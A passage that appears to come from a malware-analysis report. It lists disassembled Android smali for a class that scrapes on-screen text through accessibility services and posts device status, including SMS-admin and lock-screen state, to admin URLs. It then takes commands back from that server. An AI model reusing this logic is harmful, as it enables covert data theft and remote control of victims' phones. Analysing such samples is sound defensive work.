                        37move-result v1
                        38if-nez v1, :cond_4c
                        40invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getText()Ljava/lang/CharSequence;
                        41move-result-object v1
                        42if-eqz v1, :cond_4c
                        44invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getText()Ljava/lang/CharSequence;
                        45move-result-object v1
                        47invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        48move-result-object v1
                        50const-string v2, "CONTAINS"
                        52invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        53move-result-object v2
                        55invoke-virtual {v1, v2}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        56move-result v1
                        57if-eqz v1, :cond_15
                        58cond_4c:
                        59const-string v1, "isCheckable"
                        61invoke-virtual {p2, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        62move-result v1
                        63if-nez v1, :cond_60
                        65invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->isCheckable()Z
                        66move-result v1
                        68const-string v2, "isCheckable"
                        70invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        71move-result v2
                        72if-ne v1, v2, :cond_15
                        73cond_60:
                        74const-string v1, "isChecked"
                        76invoke-virtual {p2, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        77move-result v1
                        78if-nez v1, :cond_74
                        80invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->isChecked()Z
                        81move-result v1
                        83const-string v2, "isChecked"
                        85invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        86move-result v2
                        87if-ne v1, v2, :cond_15
                        88cond_74:
                        89const-string v1, "isVisibleToUser"
                        91invoke-virtual {p2, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        92move-result v1
                        93if-nez v1, :cond_88
                        95invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->isVisibleToUser()Z
                        96move-result v1
                        98const-string v2, "isVisibleToUser"
                        100invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        101move-result v2
                        102if-ne v1, v2, :cond_15
                        103cond_88:
                        104const-string v1, "isCheckable"
                        106invoke-virtual {p2, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        107move-result v1
                        108if-nez v1, :cond_9c
                        110invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->isCheckable()Z
                        111move-result v1
                        113const-string v2, "isCheckable"
                        115invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        116move-result v2
                        117if-ne v1, v2, :cond_15
                        118cond_9c:
                        119const-string v1, "DESCRIPTION"
                        121invoke-virtual {p2, v1}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        122move-result v1
                        123if-nez v1, :cond_be
                        125invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getContentDescription()Ljava/lang/CharSequence;
                        126move-result-object v1
                        127if-eqz v1, :cond_be
                        129invoke-virtual {p1}, Landroid/view/accessibility/AccessibilityNodeInfo;->getContentDescription()Ljava/lang/CharSequence;
                        130move-result-object v1
                        132invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        133move-result-object v1
                        135const-string v2, "DESCRIPTION"
                        137invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        138move-result-object v2
                        140invoke-virtual {v1, v2}, Ljava/lang/String;->matches(Ljava/lang/String;)Z
                        141try_end_bb: move-result v1
                        142if-eqz v1, :cond_15
                        143cond_be: const/4 v0, 0x1
                        144goto/16 :goto_15
                        145catch_c1: move-exception v1
                        146goto/16 :goto_15
                        Cross References
                        APIs
                        • android.view.accessibility.AccessibilityNodeInfo.getText
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getBoolean
                        • android.view.accessibility.AccessibilityNodeInfo.getContentDescription
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getString
                        • java.util.regex.Pattern.compile
                        • java.lang.CharSequence.toString
                        • java.util.regex.Pattern.matcher
                        • java.util.regex.Matcher.find
                        • org.json.JSONObject.getString
                        • java.util.regex.Matcher.group
                        • org.json.JSONObject.put
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • org.json.JSONObject.toString
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.getString
                        • java.lang.CharSequence.toString
                        • org.json.JSONObject.put
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • getDesc
                        • GRAB:
                        • regexp
                        • var
                        • grabBuffer:
                        • tGRAB:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3invoke-direct {p0, p1, p2}, Lcom/lib;->getElement(Landroid/view/accessibility/AccessibilityNodeInfo;Lorg/json/JSONObject;)Landroid/view/accessibility/AccessibilityNodeInfo;
                        4move-result-object v2
                        5if-eqz v2, :cond_84
                        7invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getText()Ljava/lang/CharSequence;
                        8move-result-object v1
                        10const-string v3, "getDesc"
                        12invoke-virtual {p2, v3}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        13move-result v3
                        14if-nez v3, :cond_1f
                        16const-string v3, "getDesc"
                        18invoke-virtual {p2, v3}, Lorg/json/JSONObject;->getBoolean(Ljava/lang/String;)Z
                        19move-result v3
                        20if-eqz v3, :cond_1f
                        22invoke-virtual {v2}, Landroid/view/accessibility/AccessibilityNodeInfo;->getContentDescription()Ljava/lang/CharSequence;
                        23move-result-object v1
                        24cond_1f: new-instance v2, Ljava/lang/StringBuilder;
                        26invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        28const-string v3, "GRAB: "
                        30invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        31move-result-object v2
                        33invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        34move-result-object v2
                        36invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        37move-result-object v2
                        39invoke-virtual {p0, v2}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        40if-eqz v1, :cond_84
                        42const-string v2, "regexp"
                        44invoke-virtual {p2, v2}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        45move-result v2
                        46if-nez v2, :cond_85
                        48const-string v2, "regexp"
                        50invoke-virtual {p2, v2}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        51move-result-object v2
                        53invoke-static {v2}, Ljava/util/regex/Pattern;->compile(Ljava/lang/String;)Ljava/util/regex/Pattern;
                        54move-result-object v2
                        56invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        57move-result-object v1
                        59invoke-virtual {v2, v1}, Ljava/util/regex/Pattern;->matcher(Ljava/lang/CharSequence;)Ljava/util/regex/Matcher;
                        60move-result-object v1
                        62invoke-virtual {v1}, Ljava/util/regex/Matcher;->find()Z
                        63move-result v2
                        64if-eqz v2, :cond_84
                        66sget-object v2, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        68const-string v3, "var"
                        70invoke-virtual {p2, v3}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        71move-result-object v3
                        72const/4 v4, 0x0
                        74invoke-virtual {v1, v4}, Ljava/util/regex/Matcher;->group(I)Ljava/lang/String;
                        75move-result-object v1
                        77invoke-virtual {v2, v3, v1}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        78goto_67: new-instance v1, Ljava/lang/StringBuilder;
                        80invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        82const-string v2, "grabBuffer: "
                        84invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        85move-result-object v1
                        87sget-object v2, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        89invoke-virtual {v2}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        90move-result-object v2
                        92invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        93move-result-object v1
                        95invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        96move-result-object v1
                        98invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        99const/4 v0, 0x1
                        100goto_84: return v0
                        101cond_85:
                        102sget-object v2, Lcom/lib;->grabBuffer:Lorg/json/JSONObject;
                        104const-string v3, "var"
                        106invoke-virtual {p2, v3}, Lorg/json/JSONObject;->getString(Ljava/lang/String;)Ljava/lang/String;
                        107move-result-object v3
                        109invoke-interface {v1}, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
                        110move-result-object v1
                        112invoke-virtual {v2, v3, v1}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        113try_end_94: goto/16 :goto_67
                        114catch_95: move-exception v1
                        115new-instance v2, Ljava/lang/StringBuilder;
                        117invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        119const-string v3, "tGRAB: "
                        121invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        122move-result-object v2
                        124invoke-virtual {v2, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        125move-result-object v1
                        127invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        128move-result-object v1
                        130invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        131goto/16 :goto_84
                        Cross References
                        APIs
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • android.content.Context.getContentResolver
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • org.json.JSONObject.put
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • UID
                        • GPstatus
                        • GPversion
                        • isA11Y
                        • doNotSleep
                        • isSmsAdmin
                        • isScreenLocked
                        • configID
                        • configPrefs
                        • libVer
                        • 0.0.0.1
                        • screenLockType
                        • reason
                        • knock
                        • data
                        • [func] [makeRegPacket] T:
                        Position Instruction Meta Information
                        0.prologue
                        1new-instance v0, Lorg/json/JSONObject;
                        3invoke-direct {v0}, Lorg/json/JSONObject;-><init>()V
                        4try_start_5: new-instance v1, Lorg/json/JSONObject;
                        6invoke-direct {v1}, Lorg/json/JSONObject;-><init>()V
                        8const-string v2, "UID"
                        10invoke-virtual {p0, p1}, Lcom/lib;->getUID(Landroid/content/Context;)Ljava/lang/String;
                        11move-result-object v3
                        13invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        15const-string v2, "GPstatus"
                        17invoke-virtual {p0, p1}, Lcom/lib;->getGpStatus(Landroid/content/Context;)Z
                        18move-result v3
                        20invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        22const-string v2, "GPversion"
                        24sget-object v3, Lcom/lib;->STRING_GP_APP:Ljava/lang/String;
                        26invoke-static {p1, v3}, Lcom/lib;->getAppVersion(Landroid/content/Context;Ljava/lang/String;)Ljava/lang/String;
                        27move-result-object v3
                        29invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        31const-string v2, "isA11Y"
                        33iget-object v3, p0, Lcom/lib;->a11yClassName:Ljava/lang/String;
                        35invoke-virtual {p0, p1, v3}, Lcom/lib;->isA11y(Landroid/content/Context;Ljava/lang/String;)Z
                        36move-result v3
                        38invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        40const-string v2, "doNotSleep"
                        42invoke-virtual {p0, p1}, Lcom/lib;->isOptimizationsIgnored(Landroid/content/Context;)Z
                        43move-result v3
                        45invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        47const-string v2, "isSmsAdmin"
                        49invoke-virtual {p0, p1}, Lcom/lib;->isSmsAdmin(Landroid/content/Context;)Z
                        50move-result v3
                        52invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        54const-string v2, "isScreenLocked"
                        56invoke-virtual {p0, p1}, Lcom/lib;->isScreenLocked(Landroid/content/Context;)Z
                        57move-result v3
                        59invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Z)Lorg/json/JSONObject;
                        61const-string v2, "configID"
                        63const-string v3, "configPrefs"
                        65invoke-virtual {p0, p1, v3}, Lcom/lib;->getConfigID(Landroid/content/Context;Ljava/lang/String;)Ljava/lang/String;
                        66move-result-object v3
                        68invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        70const-string v2, "libVer"
                        72const-string v3, "0.0.0.1"
                        74invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        76const-string v2, "screenLockType"
                        77new-instance v3, Lcom/lib$screenLockType;
                        79invoke-direct {v3, p0}, Lcom/lib$screenLockType;-><init>(Lcom/lib;)V
                        81invoke-virtual {p1}, Landroid/content/Context;->getContentResolver()Landroid/content/ContentResolver;
                        82move-result-object v4
                        84invoke-virtual {v3, v4}, Lcom/lib$screenLockType;->getCurrent(Landroid/content/ContentResolver;)I
                        85move-result v3
                        87invoke-virtual {v1, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;I)Lorg/json/JSONObject;
                        89const-string v2, "reason"
                        91const-string v3, "knock"
                        93invoke-virtual {v0, v2, v3}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        95const-string v2, "data"
                        97invoke-virtual {v0, v2, v1}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
                        98goto_7d: return-object v0
                        99catch_7e: move-exception v0
                        100new-instance v1, Ljava/lang/StringBuilder;
                        102invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        104const-string v2, "[func] [makeRegPacket] T: "
                        106invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        107move-result-object v1
                        109invoke-virtual {v1, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        110move-result-object v0
                        112invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        113move-result-object v0
                        115invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        116const/4 v0, 0x0
                        117goto/16 :goto_7d
                        Cross References
                        APIs
                        • java.util.List.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • org.json.JSONObject.toString
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.get
                        • java.lang.Object.equals
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getJSONObject
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getJSONArray
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.getJSONObject
                        • java.lang.Long.longValue
                        • java.lang.Thread.sleep
                        • java.lang.Integer.intValue
                        • java.lang.Thread.sleep
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • status
                        • [func] [regOnWeb] isRegistered:
                        • [func] [regOnWeb] [resultJSON] T:
                        • [func] [regOnWeb] T:
                        Position Instruction Meta Information
                        0.prologue
                        1const/4 v0, 0x0
                        2try_start_1:
                        3invoke-virtual {p0}, Lcom/lib;->getAdminUrls()Ljava/util/List;
                        4move-result-object v1
                        6invoke-interface {v1}, Ljava/util/List;->iterator()Ljava/util/Iterator;
                        7try_end_8: move-result-object v2
                        8move v1, v0
                        9try_start_a:
                        10invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
                        11move-result v0
                        12if-eqz v0, :cond_e2
                        14invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        15move-result-object v0
                        16check-cast v0, Ljava/lang/String;
                        18invoke-virtual {p0, p1}, Lcom/lib;->makeRegPacket(Landroid/content/Context;)Lorg/json/JSONObject;
                        19move-result-object v3
                        21invoke-virtual {v3}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        22move-result-object v3
                        24iget-object v4, p0, Lcom/lib;->timeout:Ljava/lang/Integer;
                        26invoke-virtual {p0, v0, v3, v4}, Lcom/lib;->sendPost(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Integer;)Ljava/lang/String;
                        27try_end_23: move-result-object v0
                        28if-eqz v0, :cond_c4
                        29try_start_26: new-instance v3, Lorg/json/JSONObject;
                        31invoke-direct {v3, v0}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
                        33const-string v0, "status"
                        35invoke-virtual {v3, v0}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        36move-result v0
                        37if-nez v0, :cond_9d
                        39const-string v0, "status"
                        41invoke-virtual {v3, v0}, Lorg/json/JSONObject;->get(Ljava/lang/String;)Ljava/lang/Object;
                        42move-result-object v0
                        44sget-object v4, Lcom/lib;->STRINGS_OK:Ljava/lang/String;
                        46invoke-virtual {v0, v4}, Ljava/lang/Object;->equals(Ljava/lang/Object;)Z
                        47move-result v0
                        48if-eqz v0, :cond_9d
                        49const/4 v1, 0x1
                        50new-instance v0, Ljava/lang/StringBuilder;
                        52invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        54const-string v4, "[func] [regOnWeb] isRegistered: "
                        56invoke-virtual {v0, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        57move-result-object v0
                        59invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        60move-result-object v0
                        62invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        63move-result-object v0
                        65invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        67sget-object v0, Lcom/lib;->STRINGS_CONFIG:Ljava/lang/String;
                        69invoke-virtual {v3, v0}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        70move-result v0
                        71if-nez v0, :cond_69
                        73sget-object v0, Lcom/lib;->STRINGS_CONFIG:Ljava/lang/String;
                        75invoke-virtual {v3, v0}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        76move-result-object v0
                        78invoke-virtual {p0, p1, v0}, Lcom/lib;->parseConfig(Landroid/content/Context;Lorg/json/JSONObject;)Z
                        79cond_69:
                        80sget-object v0, Lcom/lib;->STRINGS_COMMANDS:Ljava/lang/String;
                        82invoke-virtual {v3, v0}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        83move-result v0
                        84if-nez v0, :cond_7a
                        86sget-object v0, Lcom/lib;->STRINGS_COMMANDS:Ljava/lang/String;
                        88invoke-virtual {v3, v0}, Lorg/json/JSONObject;->getJSONArray(Ljava/lang/String;)Lorg/json/JSONArray;
                        89move-result-object v0
                        91invoke-virtual {p0, p1, v0}, Lcom/lib;->parseCommand(Landroid/content/Context;Lorg/json/JSONArray;)Z
                        92cond_7a:
                        93sget-object v0, Lcom/lib;->STRINGS_LIB:Ljava/lang/String;
                        95invoke-virtual {v3, v0}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        96move-result v0
                        97if-nez v0, :cond_8b
                        99sget-object v0, Lcom/lib;->STRINGS_LIB:Ljava/lang/String;
                        101invoke-virtual {v3, v0}, Lorg/json/JSONObject;->getJSONObject(Ljava/lang/String;)Lorg/json/JSONObject;
                        102move-result-object v0
                        104invoke-virtual {p0, p1, v0}, Lcom/lib;->parseLib(Landroid/content/Context;Lorg/json/JSONObject;)Z
                        105try_end_8b: move v0, v1
                        106goto_8c: if-nez v0, :cond_9a
                        107try_start_8e:
                        108iget-object v1, p0, Lcom/lib;->knockDelay:Ljava/lang/Long;
                        110invoke-virtual {v1}, Ljava/lang/Long;->longValue()J
                        111move-result-wide v2
                        112const-wide/16 v4, 0x3e8
                        113mul-long/2addr v2, v4
                        115invoke-static {v2, v3}, Ljava/lang/Thread;->sleep(J)V
                        116cond_9a: if-eqz v0, :cond_1
                        117goto_9c: return v0
                        118cond_9d: move v0, v1
                        119goto_9e:
                        120iget-object v1, p0, Lcom/lib;->timeout:Ljava/lang/Integer;
                        122invoke-virtual {v1}, Ljava/lang/Integer;->intValue()I
                        123move-result v1
                        124mul-int/lit16 v1, v1, 0x3e8
                        125int-to-long v4, v1
                        127invoke-static {v4, v5}, Ljava/lang/Thread;->sleep(J)V
                        128try_end_aa: move v1, v0
                        129goto/16 :goto_a
                        130catch_ad: move-exception v0
                        131try_start_ae: new-instance v3, Ljava/lang/StringBuilder;
                        133invoke-direct {v3}, Ljava/lang/StringBuilder;-><init>()V
                        135const-string v4, "[func] [regOnWeb] [resultJSON] T: "
                        137invoke-virtual {v3, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        138move-result-object v3
                        140invoke-virtual {v3, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        141move-result-object v0
                        143invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        144move-result-object v0
                        146invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        147try_end_c4: move v0, v1
                        148goto/16 :goto_9e
                        149catch_c6: move-exception v1
                        150move-object v2, v1
                        151goto_c8: new-instance v1, Ljava/lang/StringBuilder;
                        153invoke-direct {v1}, Ljava/lang/StringBuilder;-><init>()V
                        155const-string v3, "[func] [regOnWeb] T: "
                        157invoke-virtual {v1, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        158move-result-object v1
                        160invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        161move-result-object v1
                        163invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        164move-result-object v1
                        166invoke-virtual {p0, v1}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        167goto/16 :goto_9c
                        168catch_df: move-exception v2
                        169move v0, v1
                        170goto/16 :goto_c8
                        171cond_e2: move v0, v1
                        172goto/16 :goto_8c
                        Cross References
                        APIs
                        • java.lang.String.equals
                        • java.lang.String.equals
                        • java.lang.Integer.intValue
                        • java.lang.Integer.valueOf
                        • java.lang.Long.longValue
                        • java.lang.Thread.sleep
                        • java.lang.Integer.intValue
                        • java.util.List.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • org.json.JSONObject.toString
                        • org.json.JSONObject.<init>
                        • org.json.JSONObject.isNull
                        • org.json.JSONObject.get
                        • java.lang.Object.equals
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Integer.intValue
                        • java.lang.Thread.sleep
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        Strings
                        • {}
                        • status
                        • [func] [sendLog] log responce T:
                        • [func] [sendLog] log result:
                        • [log] [doInBackground] log T:
                        Position Instruction Meta Information
                        0.prologue
                        2iget-object v0, p0, Lcom/lib;->webRetries:Ljava/lang/Integer;
                        3const/4 v1, 0x0
                        5const-string v2, ""
                        7invoke-virtual {p2, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        8move-result v2
                        9if-nez v2, :cond_13
                        11const-string v2, "{}"
                        13invoke-virtual {p3, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        14move-result v2
                        15if-eqz v2, :cond_c7
                        16cond_13: move v0, v1
                        17goto_14: return v0
                        18cond_15:
                        19invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        20move-result v0
                        21add-int/lit8 v0, v0, -0x1
                        23invoke-static {v0}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        24move-result-object v0
                        26iget-object v2, p0, Lcom/lib;->knockDelay:Ljava/lang/Long;
                        28invoke-virtual {v2}, Ljava/lang/Long;->longValue()J
                        29move-result-wide v2
                        30const-wide/16 v4, 0x3e8
                        31mul-long/2addr v2, v4
                        33invoke-static {v2, v3}, Ljava/lang/Thread;->sleep(J)V
                        34move-object v2, v0
                        35goto_2c:
                        36invoke-virtual {v2}, Ljava/lang/Integer;->intValue()I
                        37move-result v0
                        38if-lez v0, :cond_c4
                        40invoke-virtual {p0}, Lcom/lib;->getAdminUrls()Ljava/util/List;
                        41move-result-object v0
                        43invoke-interface {v0}, Ljava/util/List;->iterator()Ljava/util/Iterator;
                        44move-result-object v3
                        45goto_3a:
                        46invoke-interface {v3}, Ljava/util/Iterator;->hasNext()Z
                        47move-result v0
                        48if-eqz v0, :cond_15
                        50invoke-interface {v3}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        51move-result-object v0
                        52check-cast v0, Ljava/lang/String;
                        54invoke-virtual {p0, p1, p2, p3}, Lcom/lib;->makeLogPacket(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)Lorg/json/JSONObject;
                        55move-result-object v4
                        57invoke-virtual {v4}, Lorg/json/JSONObject;->toString()Ljava/lang/String;
                        58move-result-object v4
                        60iget-object v5, p0, Lcom/lib;->timeout:Ljava/lang/Integer;
                        62invoke-virtual {p0, v0, v4, v5}, Lcom/lib;->sendPost(Ljava/lang/String;Ljava/lang/String;Ljava/lang/Integer;)Ljava/lang/String;
                        63try_end_53: move-result-object v0
                        64if-eqz v0, :cond_a0
                        65try_start_56: new-instance v4, Lorg/json/JSONObject;
                        67invoke-direct {v4, v0}, Lorg/json/JSONObject;-><init>(Ljava/lang/String;)V
                        69const-string v0, "status"
                        71invoke-virtual {v4, v0}, Lorg/json/JSONObject;->isNull(Ljava/lang/String;)Z
                        72move-result v0
                        73if-nez v0, :cond_8a
                        75const-string v0, "status"
                        77invoke-virtual {v4, v0}, Lorg/json/JSONObject;->get(Ljava/lang/String;)Ljava/lang/Object;
                        78move-result-object v0
                        80sget-object v4, Lcom/lib;->STRINGS_OK:Ljava/lang/String;
                        82invoke-virtual {v0, v4}, Ljava/lang/Object;->equals(Ljava/lang/Object;)Z
                        83try_end_6e: move-result v0
                        84if-eqz v0, :cond_8a
                        85const/4 v0, 0x1
                        86goto/16 :goto_14
                        87catch_73: move-exception v0
                        88try_start_74: new-instance v4, Ljava/lang/StringBuilder;
                        90invoke-direct {v4}, Ljava/lang/StringBuilder;-><init>()V
                        92const-string v5, "[func] [sendLog] log responce T: "
                        94invoke-virtual {v4, v5}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        95move-result-object v4
                        97invoke-virtual {v4, v0}, Ljava/lang/StringBuilder;->append(Ljava/lang/Object;)Ljava/lang/StringBuilder;
                        98move-result-object v0
                        100invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        101move-result-object v0
                        103invoke-virtual {p0, v0}, Lcom/lib;->printDebug(Ljava/lang/String;)V
                        104cond_8a: new-instance v0, Ljava/lang/StringBuilder;
                        106invoke-direct {v0}, Ljava/lang/StringBuilder;-><init>()V
                        108const-string v4, "[func] [sendLog] log result: "
                        110invoke-virtual {v0, v4}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        111move-result-object v0
                        113invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Z)Ljava/lang/StringBuilder;
                        114move-result-object v0
